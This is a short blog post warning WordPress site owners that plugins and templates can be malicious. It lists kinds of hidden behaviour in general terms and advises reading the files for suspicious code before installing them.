Wordpress security issues - inviting the hackers in and brewing them a tea
If like me you think Wordpress is a great cms you’ve probably installed several templates and plugins. But do you know what exactly it is you are installing?
Chances are unless you are a PHP programmer you won’t have given this a second thought.
So what is it you are installing?
Wordpress plugins and some templates contain code that performs a particular task. Some of my favourite plugins are listed here
So what’s the security issue?
Those plugins and templates could be malicious!
Most of us take precautions when downloading programs and files on to our desktops, but happily install plungins and templates on servers without giving it a second thought. So now you have your nice new shiny template installed, but what else is it doing? Possibilities are endless, you could be opening your server up for sending out spam, or leaving your company server open to attack.
In the last few week alone I’ve seen..
- templates email that send out emails when installed
- plugins inserting hidden links in all your posts
- mystery encoded php in templates
- plugins that install extra php files from remote servers
So what can you do?
Until there is a online system where plugins and templates are checked for security holes, and we’re able to download them from a verified source, all we can do is be very careful.. Before installing look through those template and plugin files, and check for suspicious code.
